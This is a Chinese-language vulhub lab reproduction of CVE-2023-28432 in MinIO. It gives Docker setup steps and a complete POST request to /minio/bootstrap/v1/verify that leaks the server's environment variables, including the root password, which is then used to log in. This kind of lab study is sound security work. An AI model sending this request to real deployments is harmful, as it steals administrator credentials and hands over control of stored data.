MinIO集群模式信息泄露漏洞（CVE-2023-28432）vulhub漏洞复现

MinIO是一个开源对象存储系统。在其RELEASE.2023-03-20T20-16-18Z版本（不含）以前，集群模式部署下存在一处信息泄露漏洞，攻击者可以通过发送一个POST数据包获取进程所有的环境变量，其中就包含账号密码MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD。

漏洞复现：

cd minio

cd CVE-2023-28432/

docker-compose up -d

访问http://your-ip:9001可以查看Web管理页面，访问http://your-ip:9000是API服务

漏洞存在于API节点http://your-ip:9000/minio/bootstrap/v1/verify上

启动burpsuite抓包。

发送如下数据包可查看泄露的环境变量：

POST /minio/bootstrap/v1/verify HTTP/1.1
Host: 192.168.126.128:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

利用泄露的MINIO_ROOT_USER 和MINIO_ROOT_PASSWORD 值登录系统